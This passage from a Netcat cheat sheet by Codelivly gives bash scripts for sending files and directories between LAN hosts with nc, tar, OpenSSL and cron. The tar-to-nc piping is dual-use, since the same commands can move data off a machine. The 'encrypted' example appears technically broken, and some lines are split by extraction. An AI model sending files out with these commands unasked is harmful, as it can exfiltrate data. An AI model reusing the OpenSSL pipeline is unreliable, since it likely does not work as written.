received_file.txt .

The script outputs messages to confirm when it’s ready to receive and
when the file transfer is complete.

Sender Script (Client):

#!/bin/bash

FILE_TO_SEND="/path/to/file.txt"
TARGET_IP="192.168.1.2"
PORT=1234

echo "Sending $FILE_TO_SEND to $TARGET_IP on port $PORT..."

nc $TARGET_IP $PORT < $FILE_TO_SEND
echo "File transfer completed."

Explanation:

The script reads the file ( file.txt ) and sends it to the receiver’s IP on port
1234 .

It outputs messages before and after the transfer for confirmation.

2. Automated Directory Transfer

To automate the transfer of entire directories, you can combine tar and Netcat in
a script:
Receiver Script:

Netcat Cheat Sheet - by Codelivly 33

 #!/bin/bash

PORT=1234
echo "Listening for incoming directory on port $PORT..."
nc -l -p $PORT | tar -xzf - -C /path/to/destination
echo "Directory received and extracted."

Sender Script:

#!/bin/bash

DIRECTORY_TO_SEND="/path/to/directory"
TARGET_IP="192.168.1.2"
PORT=1234

echo "Sending directory $DIRECTORY_TO_SEND to $TARGET_IP on p

ort $PORT..."
tar -czf - $DIRECTORY_TO_SEND | nc $TARGET_IP $PORT
echo "Directory transfer completed."

Explanation:

The receiver listens on port 1234 and extracts the incoming compressed
directory.

The sender compresses the directory using tar and sends it through
Netcat to the receiver.

3. File Transfer with a Timeout

To avoid hanging connections during file transfers, you can set a timeout:
Receiver Script:

#!/bin/bash

PORT=1234

Netcat Cheat Sheet - by Codelivly 34

 OUTPUT_FILE="/path/to/received_file.txt"

nc -l -p $PORT > $OUTPUT_FILE

Sender Script with Timeout:

#!/bin/bash

FILE_TO_SEND="/path/to/file.txt"
TARGET_IP="192.168.1.2"
PORT=1234

nc -w 5 $TARGET_IP $PORT < $FILE_TO_SEND

Explanation:

The w flag in the sender script sets a 5 second timeout for the connection.
If it cannot connect within that time, it closes the session.

This prevents the connection from remaining open indefinitely if there are
network issues.

4. Encrypted File Transfer

For secure transfers, you can use OpenSSL with Netcat:
Receiver Script (Encrypted Server):

#!/bin/bash

PORT=1234
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout c
ert.pem -out cert.pem
openssl s_server -quiet -accept $PORT -key cert.pem -cert cer
t.pem | nc -l -p $PORT > received_file.txt

This script generates a self-signed certificate and sets up a secure server that
listens on port 1234 .

Netcat Cheat Sheet - by Codelivly 35

 Sender Script (Encrypted Client):

#!/bin/bash

FILE_TO_SEND="/path/to/file.txt"
TARGET_IP="192.168.1.2"
PORT=1234

cat $FILE_TO_SEND | openssl s_client -quiet -connect $TARGET_

IP:$PORT | nc $TARGET_IP $PORT

The sender reads the file and sends it over an encrypted channel using
OpenSSL.

This ensures that the transfer remains secure, especially over untrusted
networks.

5. Scheduled Automated Backups

To automate file backups at regular intervals, you can use Netcat and cron jobs:
Backup Script (Sender):

#!/bin/bash

TARGET_IP="192.168.1.2"
PORT=1234
DIRECTORY="/path/to/directory"
BACKUP_FILE="/tmp/backup_$(date +%Y%m%d).tar.gz"

tar -czf $BACKUP_FILE $DIRECTORY

nc $TARGET_IP $PORT < $BACKUP_FILE

Explanation:

The script compresses the directory and creates a timestamped backup

file.

It then sends the backup file to the receiver’s IP and port.

Netcat Cheat Sheet - by Codelivly 36

 Schedule this script using cron to run automatically at intervals (e.g., daily,
weekly).

Cron Job Example:

0 2 * * * /path/to/backup_script.sh

This cron job runs the backup script every day at 2 AM.

Netcat Cheat Sheet - by Codelivly 37